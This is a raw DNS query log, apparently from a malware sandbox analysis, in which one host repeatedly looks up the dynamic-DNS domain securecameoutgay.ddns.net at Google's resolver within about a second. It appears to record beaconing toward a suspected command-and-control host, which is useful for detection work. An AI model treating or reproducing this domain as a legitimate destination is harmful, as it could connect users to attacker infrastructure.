                                                    Oct 12, 2024 23:05:49.831526041 CEST192.168.2.148.8.8.80x45e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.838354111 CEST192.168.2.148.8.8.80x45e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.845130920 CEST192.168.2.148.8.8.80x45e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.851814985 CEST192.168.2.148.8.8.80x6f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.858412981 CEST192.168.2.148.8.8.80x6f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.864679098 CEST192.168.2.148.8.8.80x6f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.871198893 CEST192.168.2.148.8.8.80x6f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.877751112 CEST192.168.2.148.8.8.80x6f8dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.884213924 CEST192.168.2.148.8.8.80xda91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.890763044 CEST192.168.2.148.8.8.80xda91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.897769928 CEST192.168.2.148.8.8.80xda91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.904423952 CEST192.168.2.148.8.8.80xda91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.911151886 CEST192.168.2.148.8.8.80xda91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.917768002 CEST192.168.2.148.8.8.80xaee3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.924778938 CEST192.168.2.148.8.8.80xaee3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.931559086 CEST192.168.2.148.8.8.80xaee3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.938533068 CEST192.168.2.148.8.8.80xaee3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.945375919 CEST192.168.2.148.8.8.80xaee3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.952369928 CEST192.168.2.148.8.8.80x2eceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.959604979 CEST192.168.2.148.8.8.80x2eceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.966603041 CEST192.168.2.148.8.8.80x2eceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.973623037 CEST192.168.2.148.8.8.80x2eceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.980598927 CEST192.168.2.148.8.8.80x2eceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.987446070 CEST192.168.2.148.8.8.80x37bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:49.994064093 CEST192.168.2.148.8.8.80x37bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.000993013 CEST192.168.2.148.8.8.80x37bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.008754969 CEST192.168.2.148.8.8.80x37bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.015583038 CEST192.168.2.148.8.8.80x37bfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.022862911 CEST192.168.2.148.8.8.80xe2b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.029691935 CEST192.168.2.148.8.8.80xe2b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.036343098 CEST192.168.2.148.8.8.80xe2b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.043586016 CEST192.168.2.148.8.8.80xe2b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.050133944 CEST192.168.2.148.8.8.80xe2b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.058111906 CEST192.168.2.148.8.8.80x931dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.064603090 CEST192.168.2.148.8.8.80x931dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.071459055 CEST192.168.2.148.8.8.80x931dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.078006983 CEST192.168.2.148.8.8.80x931dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.084338903 CEST192.168.2.148.8.8.80x931dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.091233969 CEST192.168.2.148.8.8.80x2237Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.097876072 CEST192.168.2.148.8.8.80x2237Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.104496956 CEST192.168.2.148.8.8.80x2237Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.111486912 CEST192.168.2.148.8.8.80x2237Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.118350983 CEST192.168.2.148.8.8.80x2237Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.125138044 CEST192.168.2.148.8.8.80xefebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.131867886 CEST192.168.2.148.8.8.80xefebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.138499022 CEST192.168.2.148.8.8.80xefebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.145114899 CEST192.168.2.148.8.8.80xefebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.151406050 CEST192.168.2.148.8.8.80xefebStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.158363104 CEST192.168.2.148.8.8.80xe664Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.165230989 CEST192.168.2.148.8.8.80xe664Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.171813965 CEST192.168.2.148.8.8.80xe664Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.179075003 CEST192.168.2.148.8.8.80xe664Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.186074972 CEST192.168.2.148.8.8.80xe664Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.195072889 CEST192.168.2.148.8.8.80x2aabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.203670979 CEST192.168.2.148.8.8.80x2aabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.212028980 CEST192.168.2.148.8.8.80x2aabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.220407963 CEST192.168.2.148.8.8.80x2aabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.227101088 CEST192.168.2.148.8.8.80x2aabStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.233856916 CEST192.168.2.148.8.8.80x61cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.241610050 CEST192.168.2.148.8.8.80x61cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.248348951 CEST192.168.2.148.8.8.80x61cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.262243986 CEST192.168.2.148.8.8.80x61cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.268688917 CEST192.168.2.148.8.8.80x61cbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.276209116 CEST192.168.2.148.8.8.80x6e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.283369064 CEST192.168.2.148.8.8.80x6e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.289993048 CEST192.168.2.148.8.8.80x6e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.296639919 CEST192.168.2.148.8.8.80x6e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.303359032 CEST192.168.2.148.8.8.80x6e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.310278893 CEST192.168.2.148.8.8.80xc071Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.317317009 CEST192.168.2.148.8.8.80xc071Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.323957920 CEST192.168.2.148.8.8.80xc071Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.330555916 CEST192.168.2.148.8.8.80xc071Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.337105989 CEST192.168.2.148.8.8.80xc071Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.343755007 CEST192.168.2.148.8.8.80xb220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.350708961 CEST192.168.2.148.8.8.80xb220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.357079029 CEST192.168.2.148.8.8.80xb220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.363802910 CEST192.168.2.148.8.8.80xb220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.370429039 CEST192.168.2.148.8.8.80xb220Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.377075911 CEST192.168.2.148.8.8.80x7504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.383785009 CEST192.168.2.148.8.8.80x7504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.390429974 CEST192.168.2.148.8.8.80x7504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.396930933 CEST192.168.2.148.8.8.80x7504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.404108047 CEST192.168.2.148.8.8.80x7504Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.412945986 CEST192.168.2.148.8.8.80xa94dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.420278072 CEST192.168.2.148.8.8.80xa94dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.427221060 CEST192.168.2.148.8.8.80xa94dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.433881998 CEST192.168.2.148.8.8.80xa94dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.441149950 CEST192.168.2.148.8.8.80xa94dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.447988033 CEST192.168.2.148.8.8.80x8f15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.455014944 CEST192.168.2.148.8.8.80x8f15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.461842060 CEST192.168.2.148.8.8.80x8f15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.468743086 CEST192.168.2.148.8.8.80x8f15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.475409985 CEST192.168.2.148.8.8.80x8f15Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.482088089 CEST192.168.2.148.8.8.80x6318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.488740921 CEST192.168.2.148.8.8.80x6318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.497473001 CEST192.168.2.148.8.8.80x6318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.504697084 CEST192.168.2.148.8.8.80x6318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.511688948 CEST192.168.2.148.8.8.80x6318Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.518213987 CEST192.168.2.148.8.8.80xa3d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.525012970 CEST192.168.2.148.8.8.80xa3d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.531708956 CEST192.168.2.148.8.8.80xa3d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.538942099 CEST192.168.2.148.8.8.80xa3d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.546166897 CEST192.168.2.148.8.8.80xa3d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.553275108 CEST192.168.2.148.8.8.80x75caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.560373068 CEST192.168.2.148.8.8.80x75caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.566905022 CEST192.168.2.148.8.8.80x75caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.573846102 CEST192.168.2.148.8.8.80x75caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.580658913 CEST192.168.2.148.8.8.80x75caStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.587733030 CEST192.168.2.148.8.8.80xd15aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.594521999 CEST192.168.2.148.8.8.80xd15aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.601116896 CEST192.168.2.148.8.8.80xd15aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.607835054 CEST192.168.2.148.8.8.80xd15aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.614685059 CEST192.168.2.148.8.8.80xd15aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.621469021 CEST192.168.2.148.8.8.80xbf18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.628017902 CEST192.168.2.148.8.8.80xbf18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.636045933 CEST192.168.2.148.8.8.80xbf18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.643812895 CEST192.168.2.148.8.8.80xbf18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.651504040 CEST192.168.2.148.8.8.80xbf18Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.660849094 CEST192.168.2.148.8.8.80xed23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.667469978 CEST192.168.2.148.8.8.80xed23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.674578905 CEST192.168.2.148.8.8.80xed23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.681480885 CEST192.168.2.148.8.8.80xed23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.688230038 CEST192.168.2.148.8.8.80xed23Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.694785118 CEST192.168.2.148.8.8.80x6201Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.701623917 CEST192.168.2.148.8.8.80x6201Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.708256960 CEST192.168.2.148.8.8.80x6201Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.714967966 CEST192.168.2.148.8.8.80x6201Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.721663952 CEST192.168.2.148.8.8.80x6201Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.728307009 CEST192.168.2.148.8.8.80x3e96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.734988928 CEST192.168.2.148.8.8.80x3e96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.741898060 CEST192.168.2.148.8.8.80x3e96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.749116898 CEST192.168.2.148.8.8.80x3e96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.757334948 CEST192.168.2.148.8.8.80x3e96Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.764960051 CEST192.168.2.148.8.8.80x35e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.771951914 CEST192.168.2.148.8.8.80x35e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.779129982 CEST192.168.2.148.8.8.80x35e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.785744905 CEST192.168.2.148.8.8.80x35e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.792337894 CEST192.168.2.148.8.8.80x35e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.799025059 CEST192.168.2.148.8.8.80xb08eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.805712938 CEST192.168.2.148.8.8.80xb08eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.812553883 CEST192.168.2.148.8.8.80xb08eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.819185972 CEST192.168.2.148.8.8.80xb08eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.825938940 CEST192.168.2.148.8.8.80xb08eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.832832098 CEST192.168.2.148.8.8.80x6741Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.840625048 CEST192.168.2.148.8.8.80x6741Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.847157955 CEST192.168.2.148.8.8.80x6741Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.853688955 CEST192.168.2.148.8.8.80x6741Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.860538006 CEST192.168.2.148.8.8.80x6741Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.867283106 CEST192.168.2.148.8.8.80x2f65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.873847008 CEST192.168.2.148.8.8.80x2f65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.880790949 CEST192.168.2.148.8.8.80x2f65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.887434959 CEST192.168.2.148.8.8.80x2f65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.893992901 CEST192.168.2.148.8.8.80x2f65Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.901009083 CEST192.168.2.148.8.8.80x7d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.907871962 CEST192.168.2.148.8.8.80x7d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.914257050 CEST192.168.2.148.8.8.80x7d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.920804977 CEST192.168.2.148.8.8.80x7d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.927526951 CEST192.168.2.148.8.8.80x7d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.934081078 CEST192.168.2.148.8.8.80x2f70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.940860033 CEST192.168.2.148.8.8.80x2f70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.947293997 CEST192.168.2.148.8.8.80x2f70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.953512907 CEST192.168.2.148.8.8.80x2f70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.960499048 CEST192.168.2.148.8.8.80x2f70Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.967421055 CEST192.168.2.148.8.8.80x5f0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.974114895 CEST192.168.2.148.8.8.80x5f0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.980967999 CEST192.168.2.148.8.8.80x5f0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.987844944 CEST192.168.2.148.8.8.80x5f0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:50.994187117 CEST192.168.2.148.8.8.80x5f0fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.001229048 CEST192.168.2.148.8.8.80x3888Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.009001017 CEST192.168.2.148.8.8.80x3888Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.015415907 CEST192.168.2.148.8.8.80x3888Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.021872044 CEST192.168.2.148.8.8.80x3888Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.028599977 CEST192.168.2.148.8.8.80x3888Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.035020113 CEST192.168.2.148.8.8.80xe22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.041418076 CEST192.168.2.148.8.8.80xe22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.048588991 CEST192.168.2.148.8.8.80xe22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.055265903 CEST192.168.2.148.8.8.80xe22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.062408924 CEST192.168.2.148.8.8.80xe22Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.069160938 CEST192.168.2.148.8.8.80xd18eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.075612068 CEST192.168.2.148.8.8.80xd18eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.082134962 CEST192.168.2.148.8.8.80xd18eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.088699102 CEST192.168.2.148.8.8.80xd18eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.095411062 CEST192.168.2.148.8.8.80xd18eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.101939917 CEST192.168.2.148.8.8.80xc745Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.108247042 CEST192.168.2.148.8.8.80xc745Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.114727974 CEST192.168.2.148.8.8.80xc745Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.121620893 CEST192.168.2.148.8.8.80xc745Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.128123045 CEST192.168.2.148.8.8.80xc745Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
